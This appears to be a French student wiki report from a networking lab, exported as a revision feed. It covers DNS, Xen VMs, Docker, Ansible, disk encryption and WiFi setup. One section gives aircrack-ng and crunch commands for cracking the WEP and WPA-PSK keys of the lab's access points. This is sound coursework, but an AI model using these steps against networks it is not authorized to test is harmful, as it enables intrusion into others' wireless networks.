 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 all:                                        # le groupe de machine racine c'est à dire tout&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:                                   # groupe d'hôtes contenant seulement notre VM privée&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:                               # groupe d'hôtes contenant toutes les VMs privées (la ferme de serveurs Web)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
  ntp-client:                                # groupe cible pour le déploiement de clients ntp (notre VM privée)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.2&lt;br /&gt;
  ntp-server:                                # groupe cible pour le déploiement de serveurs ntp (notre VM Publique)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.12&lt;br /&gt;
&lt;br /&gt;
On peut tester notre ferme de serveurs&lt;br /&gt;
 root@mycoplasma:/etc/ansible# ansible serveur-web -m ping -o&lt;br /&gt;
 192.168.0.3 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.2 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.4 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.1 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.5 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 192.168.0.6 | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/ansible# ansible serveur-web -m shell -a &amp;quot;uname -a&amp;quot;&lt;br /&gt;
 192.168.0.3 | CHANGED | rc=0 &amp;gt;&amp;gt;&lt;br /&gt;
 Linux private-herpesgenital 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux  &lt;br /&gt;
&lt;br /&gt;
 192.168.0.2 | CHANGED | rc=0 &amp;gt;&amp;gt;&lt;br /&gt;
 Linux private-mycoplasma 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux&lt;br /&gt;
&lt;br /&gt;
 192.168.0.4 | CHANGED | rc=0 &amp;gt;&amp;gt; &lt;br /&gt;
 Linux private-chlamydiae 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux&lt;br /&gt;
&lt;br /&gt;
 192.168.0.1 | CHANGED | rc=0 &amp;gt;&amp;gt;&lt;br /&gt;
 Linux private-6phil 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux&lt;br /&gt;
&lt;br /&gt;
 192.168.0.5 | CHANGED | rc=0 &amp;gt;&amp;gt;&lt;br /&gt;
 Linux private-chaudepisse 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux&lt;br /&gt;
&lt;br /&gt;
 192.168.0.6 | CHANGED | rc=0 &amp;gt;&amp;gt;&lt;br /&gt;
 Linux private-blennoragie 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_mycoplasma2 group radius_mycoplasma2&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model //authentication, authorization, accounting&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key mycoplasma2&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_mycoplasma2&lt;br /&gt;
   ap(config-sg-radius)# server 193.48.57.178 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_mycoplasma2&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid SSID_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52028</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52028"/>
				<updated>2020-01-05T16:49:46Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Hosts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
